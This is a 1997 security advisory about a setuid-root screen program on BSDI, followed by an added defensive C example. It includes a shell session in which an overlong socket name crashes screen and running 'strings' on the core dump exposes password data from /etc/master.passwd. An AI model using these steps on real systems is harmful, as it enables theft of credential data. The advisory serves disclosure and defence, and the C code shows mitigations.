5th Sep 1997 [SBWID-199]
COMMAND
	    /usr/contrib/bin/screen
SYSTEMS AFFECTED
	    BSDI
PROBLEM
	    Khelbin Sunvold <[email protected]> posted the following. The
	    program in question is /usr/contrib/bin/screen (BSDI). This
	    is screen version 3.05.02 and is installed setuid root, as it is
	    "supposed" to be. Here is a demonstration:
	
	        $ screen
	        Screen version 3.05.02 (FAU) 19-Aug-93
	        Copyright (c) 1993 Juergen Weigert, Michael Schroeder
	        Copyright (c) 1987 Oliver Laumann
	        [snip boring messages]
	        [Press Space or Return to end.]
	        $ screen
	        $ cd /tmp/screens/S-khelbin
	        $ ls
	        246.ttyp7.comet
	        $ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\
	        > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\
	        > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
	        $ screen -ls
	        /tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous: connect: Invalid argument
	        %1     278 Abort - core dumped  screen -ls
	        $ ls -l
	        total 176
	        srwx------  1 khelbin  khelbin       0 Feb 15 21:33 246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
	        -rw-r--r--  1 khelbin  khelbin  172032 Feb 15 21:33 core.screen
	        $ strings core.screen|less
	
	    The core.screen file contains unencrypted password strings from
	    /etc/master.passwd, which, of course, should not be readable by
	    you.

	    Brett Miller found the same bug in version 3.07.01 running on
	    BSDI 2.1 and has successfully tested it by running screen,
	    suspending with ^Z, then killing the process with a sig 11. When
	    an attempt is made to re-enter the process with fg, it dumps core.
	    Running strings on the core file will yield unshadowed passwords
	    which can be reconstructed.
SOLUTION
	    Run chmod -s /usr/contrib/bin/screen while still using an old
	    version. There were several buffer overflows in old versions of
	    screen; the latest version is 3.7.2, available from

	        ftp://prep.ai.mit.edu/pub/gnu/screen-3.7.2.tar.gz

	    The overflows have been fixed for a long time now, and I was
	    unable to reproduce the core dump on Linux with screen 3.07.01.
	    Anyway, on BSDI it seems to work.
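
The session above combines two failures: an overlong socket name crashes a setuid-root program, and the crash leaves a core file holding privileged data. The following added example (not code from screen or from the original post) shows one defence against each: a length check before a name is copied into the fixed-size `sun_path`, and `RLIMIT_CORE` set to zero. The helper names, the directory and the overlong name are hypothetical, and whether screen's overflow was in this particular buffer is not stated in the advisory.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Hypothetical helper: forbid core files for this process, so a crash
 * cannot write privileged memory (e.g. password database contents) to disk. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };          /* soft and hard limit both zero */
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Hypothetical helper: build a sockaddr_un from dir + "/" + name, refusing
 * anything that does not fit in sun_path (terminating NUL included).
 * Returns 0 on success, -1 with errno = ENAMETOOLONG otherwise. */
int make_socket_addr(struct sockaddr_un *sa, const char *dir, const char *name)
{
    size_t dlen = strlen(dir), nlen = strlen(name);

    /* Compare against the remaining space so the sum cannot wrap around. */
    if (dlen >= sizeof(sa->sun_path) ||
        nlen >= sizeof(sa->sun_path) - dlen - 1) {
        errno = ENAMETOOLONG;
        return -1;
    }
    memset(sa, 0, sizeof(*sa));
    sa->sun_family = AF_UNIX;
    memcpy(sa->sun_path, dir, dlen);
    sa->sun_path[dlen] = '/';
    memcpy(sa->sun_path + dlen + 1, name, nlen);   /* memset left the NUL */
    return 0;
}

int main(void)
{
    struct sockaddr_un sa;
    char name[201];                       /* constructed overlong name */
    memset(name, 'a', sizeof(name) - 1);
    name[sizeof(name) - 1] = '\0';
    if (disable_core_dumps() != 0)
        perror("setrlimit");
    if (make_socket_addr(&sa, "/tmp/screens/S-user", name) != 0)
        perror("socket name rejected");
    return 0;
}
```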
	
